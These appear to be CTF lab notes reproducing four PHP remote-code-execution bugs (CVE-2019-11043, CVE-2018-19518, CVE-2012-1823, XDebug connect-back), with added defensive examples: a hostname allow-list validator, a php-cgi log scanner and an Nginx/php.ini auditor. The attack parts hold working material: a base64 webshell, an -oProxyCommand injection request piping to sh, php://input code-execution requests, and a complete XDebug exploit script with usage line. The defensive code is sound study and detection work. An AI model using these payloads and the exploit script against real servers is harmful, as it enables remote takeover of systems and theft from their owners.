PHP
1. Vulnerability Reproduction
CVE-2019-11043
Affected scope: PHP-FPM + a specific Nginx configuration + PHP 7.1-7.3
nginx.conf configuration:
    location ~ [^/]\.php(/|$) {
        ...
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_pass php:9000;
        ...
    }
Installing the phuip-fpizdam tool:
When installing golang the last few packages could not be fetched; use apt install golang --fix-missing. If there are still a few problems, that is fine.
    apt install golang
    git clone https://github.com/neex/phuip-fpizdam.git
    go env -w GOPROXY=https://goproxy.cn
    cd phuip-fpizdam
    go get -v && go build
Exploitation:
./phuip-fpizdam URL/index.php
Command execution with output (if there is no response, request it again): URL/index?a=command
CVE-2018-19518
Affected scope: PHP 5.6.38 with the imap extension enabled (used for sending and receiving mail)
Preparing the payload:
    <?php echo `$_GET[1]`;?>
    base64: PD9waHAgZWNobyBgJF9HRVRbMV1gOz8+
    echo "PD9waHAgZWNobyBgJF9HRVRbMV1gOz8+" | base64 -d > /var/www/html/shell.php
Then base64-encode and URL-encode that line again (it seems + and / are not allowed).
Log in to the mailbox, intercept and modify the request; command execution without output.
    POST / HTTP/1.1
    Host: 284527d7-240d-4cf9-ad55-8a85881aeb93.challenge.ctf.show
    Content-Length: 159
    Content-Type: application/x-www-form-urlencoded
    Connection: close

    hostname=x+-oProxyCommand%3decho%09<final-encoded-result>|base64%09-d|sh}
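The request above works because the user-supplied server name is inserted verbatim into the IMAP mailbox string, where libc-client passes it to the rsh/ssh preauth command line. On the defensive side, PHP 7.1.25 / 7.2.13 / 7.3.0 introduced the php.ini directive imap.enable_insecure_rsh (default 0), which disables that code path entirely. The following is an added example, not code from these notes: a strict allow-list check applied to the hostname before it is used to build a mailbox string. The sample inputs, including the shape of the payload from the request above, are constructed for the test.

```python
import ipaddress
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# each 1-63 chars, no label starting or ending with '-', total <= 253 chars.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)'
    r'(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$'
)


def is_safe_imap_host(host: str) -> bool:
    """Accept only a plain hostname or IPv4 literal.

    Anything containing whitespace (space, tab, newline), option-like
    prefixes or mailbox delimiters ('{', '}', '/', ':') is rejected, so it
    can never be interpreted as extra rsh/ssh arguments or mailbox flags.
    """
    if not host or any(ch.isspace() for ch in host):
        return False
    if host.startswith('-'):
        return False
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def build_mailbox(host: str, port: int = 993) -> str:
    """Build the '{host:port/imap/ssl}INBOX' string for imap_open-style APIs,
    refusing any host that fails the allow-list above (assumed helper)."""
    if not is_safe_imap_host(host):
        raise ValueError('refusing unsafe IMAP host: %r' % host)
    if not 1 <= port <= 65535:
        raise ValueError('port out of range')
    return '{%s:%d/imap/ssl}INBOX' % (host, port)


# Constructed inputs: a benign host, an IPv4 literal and the option-injection
# shape seen in the captured request (tab-separated, to dodge space filtering).
SAFE_HOSTS = ['imap.example.com', '192.0.2.10']
UNSAFE_HOSTS = [
    'x -oProxyCommand=echo\tPAYLOAD|base64\t-d|sh}',
    'x\t-oProxyCommand=id',
    '-oProxyCommand=id',
    'imap.example.com/norsh',
    '',
]

if __name__ == '__main__':
    for h in SAFE_HOSTS + UNSAFE_HOSTS:
        print('%-55r -> %s' % (h, is_safe_imap_host(h)))
```

The check is deliberately an allow-list rather than a search for "-o": any character outside the hostname grammar is refused, so new option spellings or delimiter tricks do not need to be enumerated.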
CVE-2012-1823
Affected scope: php-cgi + PHP < 5.3.12, PHP < 5.4.2
Dump the source code: /index.php?-s
Arbitrary file inclusion:
    POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: 604da5e8-97f9-4974-9b09-017a09a9f49d.challenge.ctf.show
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 21
    Connection: close

    <?php system('ls');?>
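Both requests for CVE-2012-1823 share one property: the query string contains no literal "=" (the "=" in "-d allow_url_include=on" is sent as %3d), so php-cgi treats it as command-line arguments split on "+". That property is what a log-based detection can key on. Below is an added example, not part of these notes, that scans combined-format access log lines for this pattern. The log lines are constructed; the first two mirror the "?-s" and "?-d ..." requests above, the other two are benign controls (one contains "-s" as an ordinary parameter value).

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (combined log format).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 5120 "-" "curl/7.88"
10.0.0.5 - - [10/Oct/2023:12:00:02 +0000] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 88 "-" "curl/7.88"
10.0.0.7 - - [10/Oct/2023:12:00:03 +0000] "GET /index.php?page=about&id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Oct/2023:12:00:04 +0000] "GET /search.php?q=-s HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Pulls the request line out of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def is_cgi_argv_injection(query: str) -> bool:
    """True when a raw query string would be passed to php-cgi as argv.

    php-cgi only treats the query as arguments when it has no literal '=';
    it then splits on '+' and URL-decodes each piece. We flag the case where
    any resulting token looks like a command-line option.
    """
    if not query or '=' in query:
        return False
    return any(unquote(tok).startswith('-') for tok in query.split('+'))


def scan_log(text: str) -> list:
    """Return (line_number, decoded_query) for every .php request whose query
    string matches the php-cgi argument-injection pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group('target')
        if '?' not in target:
            continue
        path, query = target.split('?', 1)
        # Restricting to .php paths keeps noise down; drop this test if the
        # CGI handler is mapped to other extensions in your deployment.
        if path.endswith('.php') and is_cgi_argv_injection(query):
            hits.append((lineno, unquote(query)))
    return hits


if __name__ == '__main__':
    for lineno, decoded in scan_log(SAMPLE_LOG):
        print('line %d: php-cgi argv injection candidate: %s' % (lineno, decoded))
```

Note that unquote() leaves "+" untouched, which is intentional: php-cgi splits on "+" before decoding, so the decoded output still shows the argument boundaries.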
XDebug remote debugging RCE
Affected scope: XDebug extension enabled, with php.ini configured as follows
    xdebug.remote_connect_back = 1
    xdebug.remote_enable = 1
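Two of the preconditions on this page are pure configuration: the Nginx location block for CVE-2019-11043 (fastcgi_split_path_info plus PATH_INFO handed to PHP-FPM with no try_files guard) and the php.ini pair above that makes XDebug connect back to whichever client asked for a debug session. The following added example, which is not code from these notes, audits both from plain text. The Nginx and php.ini samples are constructed: the vulnerable ones reproduce the snippets on this page, and the hardened Nginx variant adds the commonly recommended "try_files $fastcgi_script_name =404;" so that a non-existent script is never forwarded to PHP-FPM. The location-block parser assumes no nested blocks inside a location.

```python
import re

# Constructed: the vulnerable pattern from the notes (no try_files guard).
VULNERABLE_NGINX = """
location ~ [^/]\\.php(/|$) {
    fastcgi_split_path_info ^(.+?\\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass php:9000;
}
"""

# Constructed: same block with the guard, so only scripts that exist on disk
# reach the FastCGI backend.
HARDENED_NGINX = """
location ~ [^/]\\.php(/|$) {
    try_files $fastcgi_script_name =404;
    fastcgi_split_path_info ^(.+?\\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass php:9000;
}
"""

# Constructed: the php.ini lines from the notes.
VULNERABLE_PHP_INI = """
[xdebug]
xdebug.remote_enable = 1
xdebug.remote_connect_back = 1
"""

# Matches "location <selector> { ... }" when the body has no nested braces.
LOCATION_RE = re.compile(r'location\s+[^{]*\{(.*?)\}', re.S)
TRUE_VALUES = {'1', 'on', 'true', 'yes'}


def audit_nginx(conf: str) -> list:
    """One finding per location block that forwards PATH_INFO to FastCGI
    without a try_files ... =404 guard."""
    findings = []
    for idx, body in enumerate(LOCATION_RE.findall(conf)):
        splits = 'fastcgi_split_path_info' in body
        path_info = re.search(r'fastcgi_param\s+PATH_INFO\b', body) is not None
        guarded = re.search(r'try_files\s+[^;]*=404', body) is not None
        if splits and path_info and not guarded:
            findings.append(
                'location #%d: PATH_INFO forwarded to FastCGI without a '
                'try_files =404 guard (CVE-2019-11043 precondition)' % idx)
    return findings


def parse_php_ini(ini: str) -> dict:
    """Minimal php.ini reader: strips ';' comments and section headers,
    lower-cases keys, drops surrounding quotes from values."""
    settings = {}
    for raw in ini.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        if '=' in line:
            key, value = line.split('=', 1)
            settings[key.strip().lower()] = value.strip().strip('"\'').lower()
    return settings


def audit_php_ini(ini: str) -> list:
    """Flag XDebug remote debugging that will connect back to any client."""
    s = parse_php_ini(ini)
    findings = []
    if s.get('xdebug.remote_enable') in TRUE_VALUES:
        if s.get('xdebug.remote_connect_back') in TRUE_VALUES:
            findings.append('xdebug.remote_connect_back=1: debugger connects '
                            'back to whatever host sent the request')
        elif 'xdebug.remote_host' not in s:
            findings.append('xdebug.remote_enable=1 without an explicit '
                            'xdebug.remote_host')
    return findings


if __name__ == '__main__':
    for name, conf in [('vulnerable', VULNERABLE_NGINX), ('hardened', HARDENED_NGINX)]:
        print(name, 'nginx:', audit_nginx(conf) or 'no findings')
    print('php.ini:', audit_php_ini(VULNERABLE_PHP_INI) or 'no findings')
```

Pointing the two audit functions at real files is a matter of reading them in; the parsers are intentionally simple and are meant for a first pass over a deployment, not as a replacement for nginx -T or php --ini.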
Use exp.py for RCE (the attacking machine must be reachable for the callback):
    #!/usr/bin/env python3
    import re
    import sys
    import time
    import requests
    import argparse
    import socket
    import base64
    import binascii
    from concurrent.futures import ThreadPoolExecutor

    pool = ThreadPoolExecutor(1)
    session = requests.session()
    session.headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
    }


    def recv_xml(sock):
        # DBGp messages are NUL-terminated; collect them and return the fourth block.
        blocks = []
        data = b''
        while True:
            try:
                data = data + sock.recv(1024)
            except socket.error as e:
                break
            if not data:
                break
            while data:
                eop = data.find(b'\x00')
                if eop < 0:
                    break
                blocks.append(data[:eop])
                data = data[eop+1:]
            if len(blocks) >= 4:
                break
        return blocks[3]


    def trigger(url):
        # Ask the target to start a debug session; with remote_connect_back=1
        # XDebug then connects to the host that made this request.
        time.sleep(2)
        try:
            session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
        except:
            pass


    if __name__ == '__main__':
        parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
        parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
        parser.add_argument('-t', '--target', required=True, help='target url.')
        parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
        args = parser.parse_args()

        ip_port = ('0.0.0.0', args.listen)
        sk = socket.socket()
        sk.settimeout(10)
        sk.bind(ip_port)
        sk.listen(5)

        pool.submit(trigger, args.target)

        conn, addr = sk.accept()
        conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))
        data = recv_xml(conn)
        print('[+] Receive data: ' + data.decode())
        g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
        if not g:
            print('[-] No result...')
            sys.exit(0)

        data = g.group(1)
        try:
            print('[+] Result: ' + base64.b64decode(data).decode())
        except binascii.Error:
            print('[-] May be not string result...')
    python exp.py -t http://xxx:8080/index.php -c 'shell_exec("id");'